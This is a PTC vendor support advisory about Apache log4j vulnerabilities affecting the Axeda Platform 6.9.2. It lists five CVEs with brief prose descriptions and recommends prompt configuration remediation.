Article - CS358990

PTC Axeda Products Apache log4j vulnerability - Incident Response

Modified: 10-Jan-2022   


Applies To

  • Axeda - Platform 6.9.2

Description

  • Customer alert and recommendations for remediation of the Apache log4j identified vulnerabilities CVE-2021-44228, CVE-2021-45105, CVE-2021-4104, CVE-2019-17571 and CVE-2021-44832
  • This vulnerability is in a third party library that PTC Software uses for logging of application errors, events and associated information
  • The vulnerability if exploited allows for remote and potentially malicious code execution on your environments.
  • In the interim, there may be configuration settings which will remove the vulnerability and this is recommended to be applied immediately to your PTC Axeda installations and components identified in this article
  • Log4j 2.x has reported following vulnerabilities:
    • CVE-2021-44228:
      • Description: Log4j JNDI features, do not protect against attacker controlled LDAP and other JNDI endpoints
    • CVE-2021-45105:
      • Description: Log4j 2.x did not protect from uncontrolled recursion from self-referential lookups,  cause a denial of service(DoS)
    • CVE-2021-44832:
      • Description: An attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code.
  • Log4j 1.x has reported following vulnerabilities:
    • CVE-2021-4104 :
      • Description: JMSAppender configuration along with TopicBindingName, TopicConnectionFactoryBindingName causes deserialization of untrusted data, that result in remote code execution(RCE)
    • CVE-2019-17571 :
      • Description: SocketServer class that is vulnerable to deserialization of untrusted data, can cause remote code execution(RCE)
This is a PDF version of Article CS358990 and may be out of date. For the latest version click https://www.ptc.com/en/support/article/CS358990